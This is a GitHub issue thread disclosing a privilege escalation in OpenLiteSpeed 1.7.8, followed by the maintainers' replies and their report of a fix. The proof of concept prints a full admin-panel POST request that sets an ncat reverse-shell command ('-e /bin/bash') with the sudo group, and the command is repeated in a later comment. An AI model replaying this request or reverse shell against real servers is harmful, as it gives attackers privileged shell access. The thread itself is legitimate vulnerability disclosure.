Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Openlitespeed Web Server 1.7.8 - Privilege Escalation Security Issue #217

Closed
passtheticket opened this issue Jan 31, 2021 · 7 comments
Closed

Comments

@passtheticket
Copy link

@passtheticket passtheticket commented Jan 31, 2021

Description

I found a way to escalate privileges on Ubuntu 18.04 via OpenLiteSpeed web server that runs with user(nobody):group(nogroup) privilege . According to this vulnerability , system user that has admin panel credentials can add himself to sudo group or shadow group( to read /etc/shadow file) . So that the user can execute command with high privileges.

Proof of Concept

  1. There is a test user that is not member of sudo group.

resim

  1. User changes External App configuration as following to get reverse shell with high privileges.

resim

resim

(POST) HTTP Request:

POST /view/confMgr.php HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:7080/index.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 609
Origin: https://localhost:7080
Connection: close
Cookie: litespeed_admin_lang=english; LSUI37FE0C43B84483E0=05850662073b74332d87ffa206abe963; LSID37FE0C43B84483E0=YUSipPp8emA%3D; LSPA37FE0C43B84483E0=pmN9JUxkJwg%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M%0D%0ASHELL%3D%2Fbin%2Fbash%0D%0APATH%3D%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=0&autoStart=2&path=%2Fusr%2Fbin%2Fncat+-nv+127.0.0.1+8081+-e+%2Fbin%2Fbash&backlog=100&instances=1&extUser=test&extGroup=sudo&umask=&runOnStartUp=1&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.60985900+1612100858
  1. The user sends a Graceful Restart request through admin panel and get reverse shell with sudo group privileges.

resim

@passtheticket passtheticket changed the title Privilege Escalation Security Issue Openlitespeed Web Server 1.7.8 - Privilege Escalation Security Issue Jan 31, 2021
@litespeedtech
Copy link
Owner

@litespeedtech litespeedtech commented Jan 31, 2021

Thanks for the bug report.
Yes. It is something we should address.
Have a few things not clear. The reverse shell should have "test/test" privileges, if test user only belongs to test group. I think there is something missing in the configuration you shown.
A few questions:
How suEXEC for test user is configured? at vhost level? Is its suEXEC group explicitly set to "sudo" group?
Normally, restarting web server wont cause php process to start automatically. seems you get the reverse shell immediately when server restart, how it was configured?

@passtheticket
Copy link
Author

@passtheticket passtheticket commented Jan 31, 2021

For my environment , there are two users (test and ubuntu) can log on Ubuntu . Openlitespeed web server is started by ubuntu user with sudo /usr/local/lsws/bin/lswsctrl start command.
I set extUser parameter as test and extGroup parameter as sudo in the above request. In my opinion , the issue is caused by "path" parameter. If you type ncat -nv 127.0.0.1 8081 -e /bin/bash to Command section (path parameter) , error is occured but /usr/bin/ncat -nv 127.0.0.1 8081 -e /bin/bash is valid.

resim

And I send resetting request with "Graceful Restart" button.

resim

@litespeedtech
Copy link
Owner

@litespeedtech litespeedtech commented Jan 31, 2021

We will block "sudo" group for "Run as group".
As to the command, it is difficult to block, there is endless ways to craft a harmful command. So, unless we completely disable that, if is pretty much impossible to stop.
So, the more important is to protect your webadmin login, do not let unauthorized people to access it. Treat it at the same level as root access to your server.

@passtheticket
Copy link
Author

@passtheticket passtheticket commented Jan 31, 2021

Thank you for response. I see what you mean. The Openliteserver is powerful over server.
However, "sudo , root and shadow" groups should be blocked otherwise user can escalate privilege again.

@passtheticket
Copy link
Author

@passtheticket passtheticket commented Feb 1, 2021

Hi, Could I share my findings ? If you think to update or commit, I could wait it. @litespeedtech

@litespeedtech
Copy link
Owner

@litespeedtech litespeedtech commented Feb 7, 2021

We have fixed this on webadmin input and on server binary. It will be available in 1.7.9 release.

@litespeedtech
Copy link
Owner

@litespeedtech litespeedtech commented Feb 18, 2021

It has been fixed in 1.6.20 and 1.7.9 release.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants